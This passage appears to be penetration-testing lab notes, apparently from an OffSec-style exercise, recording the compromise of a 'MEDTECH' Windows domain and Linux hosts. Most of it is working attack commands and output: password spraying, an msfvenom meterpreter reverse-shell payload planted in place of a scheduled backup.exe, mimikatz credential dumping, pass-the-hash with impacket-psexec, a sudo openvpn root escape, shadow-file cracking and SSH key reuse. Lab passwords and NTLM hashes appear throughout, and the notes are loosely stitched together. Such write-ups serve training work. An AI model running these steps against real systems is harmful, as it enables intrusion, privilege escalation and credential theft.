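    for key, value in audit(SAMPLE_LOG, SAMPLE_DIRECTORY).items():
        print(f"{key}: {value}")
```

The point of the combined report is the one the page demonstrates the hard way: a hash leaked for one account (wario) also exposes every account with the same password (yoshi), so a password-audit export should be checked for duplicate NTLM values, and any backup or monitoring tool found writing hashes into a user-readable log is a credential leak to fix at the source.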
dir c:\Users
09/29/2022 01:54 AM <DIR> .
09/29/2022 01:19 AM <DIR> Administrator
09/29/2022 01:56 AM <DIR> Administrator.MEDTECH
09/29/2022 12:08 AM <DIR> offsec
09/29/2022 01:35 AM <DIR> offsec.CLIENT01
09/29/2022 12:05 AM <DIR> Public
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
-->
C:\Users\Administrator.MEDTECH\Searches\hole.txt
PS C:\Users> cat C:\Users\Administrator.MEDTECH\Searches\hole.txt
leon:rabbit!:)
--> fake info?
Based on the nmap scan result, .12 supports RDP.
Note: crackmapexec and netexec don't work well for the rdp protocol:
proxychains -q crackmapexec 172.16.228.12 -u users.txt -p passwords.txt --local-auth
proxychains -q crackmapexec rdp/smb 172.16.228.12 -u users.txt -p passwords.txt -d MEDTECH.COM --continue-on-success
proxychains -q NetExec rdp 172.16.214.12 -u users.txt -p passwords.txt -d MEDTECH.COM
----> No correct info! :(
So we need to manually check whether we can log in via RDP using the current username/password.
--->
proxychains -q xfreerdp /u:'yoshi' /p:'Mushroom!' /d:'MEDTECH.COM' /f +fonts +clipboard /v:172.16.214.12 /cert-ignore /drive:.,kali-share
---> RDP login successful!
Found backup.exe file under 'C:\TEMP' folder.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} ---> No useful info.
$env:path ----> No suspicious info
C:\Users\yoshi\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt --> No info
[Kali]
prepare a met.exe: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
and use metasploit multi/handler to receive reverse shell:sudo msfconsole -q
[Victim] Use met.exe to replace backup.exe under C:\TEMP ----> After around 10-15 min, the msfconsole listener got a reverse shell from the victim with admin rights!!! ---> But, WHY?????
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
---> no useful info except proof.txt
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords ---->
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam ----> No useful info
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.214.10 ----> Login to DC01 successfully!
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.10 ----> Login to DC01
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
--->
C:\Users\Administrator\Desktop\credentials.txt
--->
web01: offsec/century62hisan51
Which one is 'web01'? Let's try it manually
---> [On Kali] ssh offsec@192.168.x.120/122 172.16.x.14 --> Can SSH log in to 192.168.x.120, which is web01.
[On Kali] proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:)) --> No info
proxychains -q crackmapexec smb 172.16.188.10-14 -u leon -d MEDTECH.COM -p "rabbit:)" --shares
--->
SMB 172.16.188.10 445 DC01 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.12 445 DEV04 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.11 445 FILES02 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.13 445 PROD01 [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB 172.16.188.10 445 DC01 [+] Enumerated shares
SMB 172.16.188.10 445 DC01 Share Permissions Remark
SMB 172.16.188.10 445 DC01 ----- ----------- ------
SMB 172.16.188.10 445 DC01 ADMIN$ READ,WRITE Remote Admin
SMB 172.16.188.10 445 DC01 C$ READ,WRITE Default share
SMB 172.16.188.10 445 DC01 IPC$ READ Remote IPC
SMB 172.16.188.10 445 DC01 NETLOGON READ,WRITE Logon server share
SMB 172.16.188.10 445 DC01 SYSVOL READ Logon server share
--->
Because the 'NETLOGON' share on DC01 has RW rights, we can upload mimikatz.exe from Kali to DC01:
proxychains -q smbclient //172.16.188.10/NETLOGON -c 'put mimikatz.exe' --user='MEDTECH.COM/leon%rabbit:)'
[DC01]
Get-ChildItem -Path C:\ mimikatz.exe -File -Recurse -ErrorAction SilentlyContinue
---> mimikatz.exe is located at C:\Windows\SYSVOL\domain\scripts
cp C:\Windows\SYSVOL\domain\scripts\mimikatz.exe c:\users\leon\
--->
Then,
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
---->
Username : Administrator
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam ----> User : Administrator Hash NTLM: 6bff4295a37d9c810ab95210a732f25a
no more useful info
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.188.10 MEDTECH.com/Administratior (PWD: denZV00Zwtpax57. ) ----> Not found.
---> Next, we can also login to PROD01(172.16.x.13) : proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13
proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.13 --> Login successful
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> no useful info except proof.txt
Found there is a 'output.txt' under C:\ ---> no useful info inside.
Prepare a user list containing all users found so far.
For 14:
proxychains -q hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://172.16.188.14 -v
---> No progress..
For 122: hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.188.122 ---> found it! offsec:password
ssh offsec@192.168.188.122 --> succeeded, but offsec has no root privileges and many commands are forbidden. Based on the message below (lshell):
- You are in a limited shell. Type '?' or 'help' to get the list of allowed commands
offsec:~$ help cat cd clear echo exit help history ll lpath ls lsudo sudo
offsec:~$ sudo -l
[sudo] password for offsec:
Matching Defaults entries for offsec on vpn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User offsec may run the following commands on vpn:
    (ALL : ALL) /usr/sbin/openvpn
---->
According to 'https://gtfobins.github.io/gtfobins/openvpn/#sudo'
sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'
---> Got root privileges!
ls /home ---> found mario and its .ssh dir
cat /etc/passwd
mario:x:1001:1001::/home/mario:/bin/sh
cat /etc/shadow
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::
----> crack it
copy mario info to Kali
┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
mario:x:1001:1001::/home/mario:/bin/sh
┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::
└─$ unshadow passwd.txt shadow.txt > unshadowed.txt
┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:1001:1001::/home/mario:/bin/sh
┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
---> FAILED..............
Note: MUST add '--format=crypt' for john command!! Otherwise, john will alert as 'no password hashes loaded (see FAQ)' https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded
cd .ssh
ssh -i id_rsa mario@172.16.188.14 ---> logged in successfully!
On 192.168.x.122,
cd /home/mario/.ssh
ssh -i id_rsa mario@172.16.188.14
---> we can find local.txt. There is no proof.txt on this host, so we don't need to escalate our privileges.
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue to search for info
Judging by the name of the binary, we could assume maybe there is a ||scheduled task running|| with the context of a high value target (Administrator or NT authority\System user) which our current user won't have visibility to check out using the ||schtasks|| command.
However, we can look for running processes using the same name as the binary suggests. ||watch-command (https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1)|| would be a great tool for inspecting service footprints.
I hope this explanation makes sense.
Lab1
Because Kali is in the 192.168.x.x subnetwork, let's enumerate the following hosts first.